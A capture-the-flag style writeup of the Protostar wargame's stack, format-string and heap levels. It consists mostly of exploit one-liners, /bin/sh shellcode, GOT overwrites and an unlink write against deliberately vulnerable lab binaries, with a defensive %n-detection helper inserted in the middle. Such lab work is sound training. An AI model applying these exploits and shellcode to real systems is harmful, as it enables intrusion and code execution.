Exploit-Exercises Protostar writeup PART I

stack0

$ python -c "print 0x44*'a'" | ./stack0
you have changed the 'modified' variable

stack1

$ python -c "print 0x40*'a'+'\x64\x63\x62\x61'" | xargs ./stack1
you have correctly got the variable to the right value

stack2

import os

# 0x40 bytes of filler reach the 'modified' variable, then the expected value 0x0d0a0d0a
payload = 'a'*0x40 + '\x0a\x0d\x0a\x0d'
# stack2 reads its input from the GREENIE environment variable
os.putenv("GREENIE", payload)
os.system("./stack2")

stack3

$ readelf -a stack3 | grep win
There are no unwind sections in this file.
    56: 08048424    20 FUNC    GLOBAL DEFAULT   14 win
$ python -c "print 0x40*'a'+'\x24\x84\x04\x08'" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

stack4

$ readelf -a stack4 | grep win
There are no unwind sections in this file.
    56: 080483f4    20 FUNC    GLOBAL DEFAULT   14 win
$ python -c "print 76*'a'+'\xf4\x83\x04\x08'" | ./stack4
code flow successfully changed

stack5

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : disabled

ASLR is not enabled on the system. Crash the program and debug the core dump to obtain the stack address.

python -c "print 0x4c*'a'+'\x10\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack5

stack6

return address => address of a `ret` instruction => stack address (the extra `ret` returns into the stack address that follows it)

# retn 0x08048508
python -c "print 0x50*'a'+'\x08\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6

stack7

# retn 0x08048553
python -c "print 0x50*'a'+'\x53\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6

format0

root@protostar:/opt/protostar/bin# python -c "print 0x40*'a'+'\xef\xbe\xad\xde'" | xargs ./format0
you have hit the target correctly :)

format1

%128$n refers to the 128th argument; argv sits on the stack, so a large enough positional index reaches the address we pass in as an argument.

root@protostar:/opt/protostar/bin# python -c "print '\x38\x96\x04\x08\x08\x04aaa%128\$n'" | xargs ./format1 aaa
you have modified the target :)

format2

[-------------------------------------code-------------------------------------]
   0x8048477 <vuln+35>:  call   0x804835c <fgets@plt>
   0x804847c <vuln+40>:  lea    eax,[ebp-0x208]
   0x8048482 <vuln+46>:  mov    DWORD PTR [esp],eax
=> 0x8048485 <vuln+49>:  call   0x804837c <printf@plt>
   0x804848a <vuln+54>:  mov    eax,ds:0x80496e4
   0x804848f <vuln+59>:  cmp    eax,0x40
   0x8048492 <vuln+62>:  jne    0x80484a2 <vuln+78>
   0x8048494 <vuln+64>:  mov    DWORD PTR [esp],0x8048590
Guessed arguments:
arg[0]: 0xffffd450 ("aaaaaa\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd440 --> 0xffffd450 ("aaaaaa\n")
0004| 0xffffd444 --> 0x200
0008| 0xffffd448 --> 0xf7fc2c20 --> 0xfbad2288
0012| 0xffffd44c --> 0xf7fec308 (<_dl_check_map_versions+632>: mov edi,eax)
0016| 0xffffd450 ("aaaaaa\n")

exploit:

root@protostar:/opt/protostar/bin# python -c "print '\xe4\x96\x04\x08%4\$060x%4\$n'" | ./format2
.0000000000000000000000000000000000000000000000000000080496e4
you have modified the target :)

format3

python -c "print '\xf4\x96\x04\x08%12\$016930112x%12\$n'" | ./format3

In hindsight my method is a bit weak; writing one byte at a time is the better approach.

python -c 'print "\xf4\x96\x04\x08"+"\xf5\x96\x04\x08"+"\xf6\x96\x04\x08"+"\xf7\x96\x04\x08"+"%52x%12$n%13$n%14$n%15$n"' | ./format3
target is 44444444 :(

format4

Overwrite the data in exit's GOT entry, GOT["exit"]=0x08049724, one byte at a time.

python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08'+'%0164x%4\$n%0208x%5\$n%0128x%6\$n%260x%7\$n'" | ./format4
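The following Python helper is an added example, not part of this writeup: it scans untrusted input for %n-family directives (the check a defender would put in front of any printf that takes user data) and, under a simple byte-count model, computes how many bytes printf would have emitted before each write, which is the value %n stores. Run over the format2, format3 and format4 payloads above it reproduces the values they aim at (0x40, 0x44 for each of the four writes, and the four low bytes b4 84 04 08 in format4). The model (each non-%n conversion emits exactly its field width, or one byte when no width is given) is an assumption of this helper, so the reported value is a lower bound.

```python
import re

# One printf conversion spec: optional positional "N$", flags, width,
# precision, length modifier and the conversion character.
_SPEC = re.compile(
    rb'%(?:(\d+)\$)?([-+ #0]*)(\d*)(?:\.(\d+))?(hh|h|ll|l)?([diouxXeEfgGaAcspn%])'
)


def scan_format_input(data: bytes):
    """Report every %n write an attacker-controlled format string would do.

    Returns a list of (argument_index, length_modifier, bytes_printed_before).
    Model assumption (ours, not libc's): a conversion other than %n emits
    exactly its field width, or one byte when no width is given, and literal
    bytes emit themselves. Real output can only be longer, so the value is a
    lower bound on what %n stores.
    """
    writes = []
    printed = 0      # bytes emitted so far == the value %n would store
    next_arg = 1     # sequential argument counter for non-positional specs
    pos = 0
    for m in _SPEC.finditer(data):
        printed += m.start() - pos          # literal text before this spec
        pos = m.end()
        index, _flags, width, _prec, length, conv = m.groups()
        if conv == b'%':                    # "%%" prints a single percent sign
            printed += 1
            continue
        arg = int(index) if index else next_arg
        if not index:
            next_arg += 1
        if conv == b'n':
            writes.append((arg, (length or b'').decode(), printed))
        else:
            printed += int(width) if width else 1
    return writes


def written_low_bytes(writes):
    """Low byte of each write: what survives when 4-byte writes land one byte apart."""
    return bytes(value & 0xFF for _, _, value in writes)


def is_format_string_attack(data: bytes) -> bool:
    """User-supplied data that carries any %n directive should be rejected outright."""
    return bool(scan_format_input(data))
```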

heap0

winner = 0x08048464

root@protostar:/opt/protostar/bin# python -c "print 72*'a'+'\x64\x84\x04\x08'" | xargs ./heap0
data is at 0x804a008, fp is at 0x804a050
level passed

heap1

GOT["puts"] = 0x08049774
winner = 0x08048494

Nothing special here: overwrite the second pointer with the GOT address of puts, so the second strcpy writes winner into the GOT entry of puts.

root@protostar:/opt/protostar/bin# ./heap1 $(python -c "print 20 * 'a' + '\x74\x97\x04\x08'") $(python -c "print '\x94\x84\x04\x08'")
and we have a winner @ 1491862467

heap2

An obvious UAF. struct auth is 36 bytes: create auth first, free it, then use strdup to allocate a 36-byte chunk, which reuses the freed one.

[ auth = (nil), service = (nil) ]
auth aaaaa
[ auth = 0x903d008, service = (nil) ]
reset
[ auth = 0x903d008, service = (nil) ]
serviceaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[ auth = 0x903d008, service = 0x903d018 ]
login
you have logged in already!
[ auth = 0x903d008, service = 0x903d018 ]

heap3

The unlink macro gives an arbitrary-address write.

root@protostar:/opt/protostar/bin# ./heap3 $(python -c 'print "A" * 4 + "\x68\x64\x88\x04\x08\xc3"') $(python -c 'print "A" * 32 + "\xf8\xff\xff\xff" + "\xfc\xff\xff\xff" + "A" * 8 + "\x1c\xb1\x04\x08" + "\x0c\xc0\x04\x08"') CCCC
that wasn't too bad now, was it? @ 1491865342
